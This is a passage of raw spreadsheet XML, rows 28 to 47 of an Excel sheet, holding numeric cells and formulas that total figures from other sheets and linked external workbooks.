        <f>J28+'9'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]10'!$W$104</f>
        <v>29.4527363183993</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]10'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]10'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]10'!$T$104</f>
        <v>62.3625</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]10'!$U$104</f>
        <v>96.23625</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]10'!$V$104</f>
        <v>65.2981710271318</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]10'!$Q$104</f>
        <v>14.967</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]10'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]10'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'9'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'9'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]10'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]10'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]10'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]10'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]10'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]10'!$V$105</f>
        <v>33.965382751938</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]10'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]10'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]10'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'9'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'9'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]10'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]10'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]10'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]10'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]10'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]10'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]10'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]10'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]10'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]10'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]10'!$E$16</f>
        <v>6976</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'9'!H31</f>
        <v>44780</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1417787</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]10'!$I$16</f>
        <v>4048.39</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'9'!K31</f>
        <v>49414.36</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1405462.49</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]10'!$L$16</f>
        <v>60795.01</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>81.0600133333333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'[11]10'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]10'!$E$13</f>
        <v>6563</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'9'!H32</f>
        <v>40376</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1568219</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]10'!$I$13</f>
        <v>4792</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'9'!K32</f>
        <v>33390</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1054868</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]10'!$L$13</f>
        <v>66756.616</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>133.513232</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]10'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]10'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]10'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]10'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]10'!$U$76</f>
        <v>3.75e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]10'!$V$76</f>
        <v>4.10610465116279e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]10'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]10'!$R$76</f>
        <v>9e-11</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]10'!$S$76</f>
        <v>3.39e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]10'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'9'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]10'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'9'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]10'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]10'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]10'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]10'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]10'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]10'!$U$77</f>
        <v>4.16666666666667e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]10'!$V$77</f>
        <v>61.2865794573658</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]10'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]10'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]10'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]10'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'9'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]10'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'9'!K34</f>
        <v>666.89</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>467869.82</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]10'!$L$15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'[11]10'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'9'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]10'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'9'!K35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G36+'9'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'9'!K36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G37+'9'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'9'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]10'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]10'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]10'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'9'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]10'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'9'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]10'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'9'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'9'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]10'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]10'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]10'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'9'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]10'!$V$10</f>
        <v>504</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'9'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]10'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'9'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'9'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]10'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]10'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]10'!$R$50</f>
        <v>363.02</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'9'!U39</f>
        <v>3251.46</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>82065.059</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]10'!$V$50</f>
        <v>254</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'9'!X39</f>
        <v>2987</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>81746</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]10'!$Y$50</f>
        <v>1496.006</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'9'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'9'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]10'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]10'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]10'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]10'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]10'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]10'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]10'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]10'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]10'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]10'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]10'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'9'!H41</f>
        <v>2156</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>127132</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]10'!$I$16</f>
        <v>979.93</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'9'!K41</f>
        <v>5262.78</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>126656.32</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]10'!$L$16</f>
        <v>23022.98</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>76.7432666666667</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]10'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]10'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]10'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'9'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]10'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'9'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]10'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]10'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]10'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'9'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]10'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'9'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]10'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]10'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]10'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]10'!$R$8</f>
        <v>626.88</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'9'!U42</f>
        <v>3219.78</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>210806.75</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]10'!$V$8</f>
        <v>829</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'9'!X42</f>
        <v>5375</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>207846</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]10'!$Y$8</f>
        <v>6323.616</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]10'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]10'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'9'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]10'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'9'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]10'!$L$14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'[12]10'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'9'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]10'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'9'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]10'!$L$15</f>
        <v>65896.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]10'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]10'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]10'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'9'!U44</f>
        <v>2689</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>67442.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]10'!$V$29</f>
        <v>265</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'9'!X44</f>
        <v>1723</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>68133</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]10'!$Y$29</f>
        <v>3265.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]10'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'9'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]10'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'9'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]10'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]10'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]10'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]10'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]10'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]10'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]10'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]10'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]10'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'9'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'9'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]10'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]10'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]10'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'9'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]10'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'9'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]10'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'9'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'9'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]10'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]10'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]10'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'9'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]10'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'9'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
